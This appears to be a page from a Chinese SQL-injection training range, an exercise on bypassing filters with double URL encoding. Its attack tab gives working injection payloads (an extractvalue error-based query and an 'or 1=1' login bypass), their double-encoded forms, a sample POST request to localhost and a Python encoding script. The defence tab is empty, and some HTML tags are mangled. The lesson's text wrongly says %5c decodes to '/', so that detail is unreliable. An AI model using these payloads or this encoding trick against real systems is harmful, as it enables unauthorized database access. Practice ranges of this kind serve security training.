<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title></title>
    <meta name="renderer" content="webkit">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport"
          content="width=device-width,user-scalable=yes, minimum-scale=0.4, initial-scale=0.8,target-densitydpi=low-dpi"/>
    <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"/>
    <link rel="stylesheet" href="../../statics/xadmin/css/font.css">
    <link rel="stylesheet" href="../../statics/xadmin/css/xadmin.css">
    <link rel="stylesheet" href="../../statics/ceber/css/mardown-css-jwsky.css">
    <link rel="stylesheet" href="../../statics/ceber/css/highlight/arduino-light.css">
    <script type="text/javascript" src="../../statics/xadmin/js/jquery.min.js"></script>
    <script src="../../statics/xadmin/lib/layui/layui.js" charset="utf-8"></script>
    <script src="../../statics/ceber/js/showdown.min.js" charset="utf-8"></script>
    <script src="../../statics/ceber/js/ceber.js" charset="utf-8"></script>
    <script src="../../statics/ceber/js/highlight.pack.js" charset="utf-8"></script>
    <style>
        .layui-tab-content {
            padding: 0px;
            padding-top: 10px;
        }

        input {
            margin-bottom: 10px;
        }
    </style>
</head>
<body>
<div class="x-body layui-anim layui-anim-up">
    <blockquote class="layui-elem-quote">URL编码绕过</blockquote>
    <fieldset class="layui-elem-field">
        <legend>题目区</legend>
        <div class="layui-field-box">
            <div class="layui-row" style="vertical-align:bottom">
                <form class="layui-form" method="POST" name="form"
                      action="/ceber-range/sqli/sql23">
                    <input type="text" name="account" placeholder="请输入用户名" autocomplete="off" class="layui-input">
                    <button type="button" class="layui-btn layui-btn-mini" onclick="ceberSubmit(this);">查询</button>
                </form>
            </div>
            <div class="layui-row" id="rs-message">
            </div>
            <div class="layui-row" id="rs-body">
            </div>
            <div class="layui-row" id="rs-hit">
            </div>
            <div class="layui-row" id="rs-bak">
            </div>
        </div>
    </fieldset>
    <fieldset class="layui-elem-field">
        <legend>解题区</legend>
        <div class="layui-tab layui-field-box">
            <ul class="layui-tab-title">
                <li class="layui-this">描述</li>
                <li>提示</li>
                <li>源代码</li>
                <li>攻击方法</li>
                <li>防御</li>
            </ul>
            <div class="layui-tab-content">
                <div class="layui-tab-item layui-show" id="mubiao">描述</div>
                <div class="layui-tab-item" id="tishi">提示</div>
                <div class="layui-tab-item" id="yuandaima">源代码</div>
                <div class="layui-tab-item" id="gongjifangfa">攻击方法</div>
                <div class="layui-tab-item" id="fangyu">防御</div>
            </div>
        </div>
    </fieldset>

    <code id="mubiao_source" style="display:none">
        <script type='text/html' style='display:block'>
            进行注入，获取所有用户信息。

            就是说想打/，一般编码一次是%5c。

            但攻击者怕这个会被认出来，所以用二次编码，把%本身编码成%25。再和后边拼成%255c。

            如果URL解码器有缺陷，只不断重复“从前边开始解析”这个步骤，就会把这个先变回%5c，再变成/，出现循环解析。当然这是错误的。正确的只应该解一步变成%5c。

            要正确进行URL解码。
        </script>
        <
        /code>

        < code
        id = "tishi_source"
        style = "display:none" >
            < script
        type = 'text/html'
        style = 'display:block' >


        </script>
    </code>

    <code id="yuandaima_source" style="display:none">
        <script type='text/html' style='display:block'>


        </script>
        <
        /code>

        < code
        id = "gongjifangfa_source"
        style = "display:none" >
            < script
        type = 'text/html'
        style = 'display:block' >
            ```
' and extractvalue(1, concat(0x5c,version())) #

%2527%2520%2561%256E%2564%2520%2565%2578%2574%2572%2561%2563%2574%2576%2561%256C%2575%2565%2528%2531%252C%2520%2563%256F%256E%2563%2561%2574%2528%2530%2578%2535%2563%252C%2576%2565%2572%2573%2569%256F%256E%2528%2529%2529%2529%2520%2523

admin' or 1=1 #

%2561%2564%256D%2569%256E%2527%2520%256F%2572%2520%2531%253D%2531%2520%2523

```


                ```
POST /ceber-range/sqli/sql23 HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 243
Accept: */*
Origin: http://127.0.0.1:8081
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://127.0.0.1:8081/ceber-range/sqli/23.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Connection: close

account=%2527%2520%2561%256E%2564%2520%2565%2578%2574%2572%2561%2563%2574%2576%2561%256C%2575%2565%2528%2531%252C%2520%2563%256F%256E%2563%2561%2574%2528%2530%2578%2535%2563%252C%2576%2565%2572%2573%2569%256F%256E%2528%2529%2529%2529%2520%2523
```


                ```
import string
 
payload="' and extractvalue(1, concat(0x5c,version())) #"
retVal = payload
 
if payload:
    retVal = ""
    i = 0
 
    while i < len(payload):
        if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
            retVal += '%%25%s' % payload[i + 1:i + 3]
            i += 3
        else:
            retVal += '%%25%.2X' % ord(payload[i])
            i += 1
 
print retVal
```
        </script>
    </code>

    <code id="fangyu_source" style="display:none">
        <script type='text/html' style='display:block'>


        </script>
        <
        /code>
        < blockquote
        class
        = "layui-elem-quote layui-quote-nm" > 持续集成 < /blockquote>
            < /div>
            < /body>

            < script >
            $(function () {
                //加载弹出层
                layui.use(['form', 'element'],
                    function () {
                        layer = layui.layer;
                        element = layui.element;
                    });
                var converter = new showdown.Converter();
                $("#mubiao").html(converter.makeHtml($("#mubiao_source").html().substr(48)));
                $("#tishi").html(converter.makeHtml($("#tishi_source").html().substr(48)));
                $("#yuandaima").html(converter.makeHtml($("#yuandaima_source").html().substr(48)));
                $("#gongjifangfa").html(converter.makeHtml($("#gongjifangfa_source").html().substr(48)));
                $("#fangyu").html(converter.makeHtml($("#fangyu_source").html().substr(48)));
            });

        $(document).ready(function () {
            $('pre code').each(function (i, block) {
                hljs.highlightBlock(block);
            });
        });
        </script>
</html>